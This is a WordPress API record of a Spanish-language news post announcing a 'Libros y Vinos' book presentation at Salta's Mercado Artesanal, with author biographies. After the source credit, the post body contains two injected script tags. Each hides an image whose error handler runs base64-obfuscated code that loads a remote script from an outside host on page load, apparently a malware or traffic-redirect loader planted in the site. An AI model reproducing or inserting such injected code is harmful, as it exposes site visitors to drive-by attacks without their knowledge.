{"id":2625,"date":"2023-05-12T11:08:39","date_gmt":"2023-05-12T14:08:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2625"},"modified":"2025-08-14T00:17:03","modified_gmt":"2025-08-14T03:17:03","slug":"llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2625","title":{"rendered":"Llega una nueva edici\u00f3n de libros y vinos en el Mercado Artesanal de Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-cyan-bluish-gray-color has-text-color has-background\" style=\"background-color:#76053f\"><em>Hoy viernes 12 de mayo a las 19:30 horas, se presentar\u00e1n los libros Bajo la Luna de M\u00f3nica Ovejero y As\u00ed fue que la llamaron Salta de Rafael Guti\u00e9rrez. Se compartir\u00e1 vinos con los presentes. Entrada gratuita.<\/em><\/h3>\n\n\n\n<p>El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores filial Salta, llevan a cabo la iniciativa \u201cLibros y Vinos\u201d, una propuesta que propicia un ambiente agradable de lectura, permitiendo al p\u00fablico emprender un viaje literario en el que el vino y el libro se unen para relajar y disfrutar las obras.<\/p>\n\n\n\n<p>La cita es hoy&nbsp;viernes 12 de mayo a las 19:30 horas en el Sal\u00f3n de Usos M\u00faltiples \u201cMar\u00eda Gertrudis Medeiros\u201d del Mercado Artesanal, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<p>En esta oportunidad, M\u00f3nica Ovejero presenta Bajo la Luna, una segunda edici\u00f3n ampliada de narraciones cortas que profundizan las emociones y sentimientos de las personas hasta tocar lo m\u00e1s oscuro del alma.<\/p>\n\n\n\n<p>Por su parte, Rafael Guti\u00e9rrez presenta As\u00ed fue la llamaron Salta, un ensayo literario hist\u00f3rico sobre el proceso de la creaci\u00f3n de la provincia, desde su fundaci\u00f3n hasta mediados del siglo XX, con un resumido tratamiento de sus principales hechos y protagonistas.<\/p>\n\n\n\n<p>Acompa\u00f1a el evento, Nueve Cumbres Bodegas y Vi\u00f1edos. La bodega nace de un sentimiento de amor familiar a Cachi debido a la caracter\u00edstica belleza que engloba paisaje, cultura y patrimonio arquitect\u00f3nico que lo distingue como uno de los pueblos con m\u00e1s encanto en los Valles.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7051-llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7051-llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta.jpg\" alt=\"Llega una nueva edici\u00f3n de libros y vinos en el Mercado Artesanal de Salta\" width=\"391\" height=\"220\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Sobre los autores<\/strong><\/p>\n\n\n\n<p>Rafael Fabi\u00e1n Guti\u00e9rrez, naci\u00f3 en 1965 en Salta Capital. Estudi\u00f3 el nivel primario y secundario en el Colegio Belgrano de Salta y continu\u00f3 sus estudios universitarios en la Universidad Nacional de Salta (UNSa), en la que se recibi\u00f3 de Profesor Universitario en Letras y Licenciado en Letras.<\/p>\n\n\n\n<p>Curs\u00f3 estudios de posgrado en el Instituto \u00abBerta Vidal de Batini\u00bb de la Universidad Cat\u00f3lica de Salta, donde se recibi\u00f3 de Especialista en Ling\u00fc\u00edstica.<\/p>\n\n\n\n<p>Docente en la UNSa de las c\u00e1tedras \u00abLiteratura Argentina\u00bb y \u00abProblem\u00e1ticas de las Literaturas Argentina e Hispanoamericana\u00bb.<\/p>\n\n\n\n<p>Fue becario del Fondo Nacional de las Artes y coordinador en la Formaci\u00f3n de Narradores de la Fundaci\u00f3n Antorchas y la Secretar\u00eda de Cultura de la Provincia de Salta. Actualmente es el Coordinador Responsable de la Editorial EUNSa.<\/p>\n\n\n\n<p>M\u00f3nica Ovejero public\u00f3 en el 2006 su primer libro de poemas titulado \u201cApasionado Motivo\u201d y desde all\u00ed no dej\u00f3 de publicar.<\/p>\n\n\n\n<p>En el 2007, con motivo de los 400 a\u00f1os de la Literatura Salte\u00f1a, la Secretar\u00eda de Cultura de la Provincia de Salta incluy\u00f3 sus obras en la Antolog\u00eda Po\u00e9tica junto a los m\u00e1s grandes autores salte\u00f1os: Castillas, D\u00e1valos, Ar\u00e1oz Anzo\u00e1tegui, entre otros.<\/p>\n\n\n\n<p>Particip\u00f3 en la Feria Internacional del Libro de Buenos Aires, invitada por la Uni\u00f3n Personal Civil de la Naci\u00f3n (UPCN). Gan\u00f3 el primer premio en categor\u00eda cuentos en el Concurso realizado por la Editorial \u201cEdiciones Artesanales del Duende\u201d con el libro \u201cBajo la Luna\u201d<\/p>\n\n\n\n<p>Actualmente, es la secretaria general de la Sociedad Argentina de Escritores (SADE) Filial Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta-89578\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy viernes 12 de mayo a las 19:30 horas, se presentar\u00e1n los libros Bajo la Luna de M\u00f3nica Ovejero y As\u00ed fue que la llamaron Salta de Rafael Guti\u00e9rrez. Se compartir\u00e1 vinos con los presentes. Entrada gratuita. El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores filial Salta, llevan a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2626,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-2625","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2625"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2625"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2625\/revisions"}],"predecessor-version":[{"id":7086,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2625\/revisions\/7086"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2626"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}